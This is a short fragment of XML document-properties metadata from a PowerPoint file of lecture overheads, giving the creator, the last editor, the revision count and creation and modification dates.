      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Useful links</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11 Lecture Overheads</dc:subject>
  <dc:creator>Dr Lawrie Brown</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vivian</cp:lastModifiedBy>
  <cp:revision>168</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-09-10T15:34:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-18T23:33:11Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>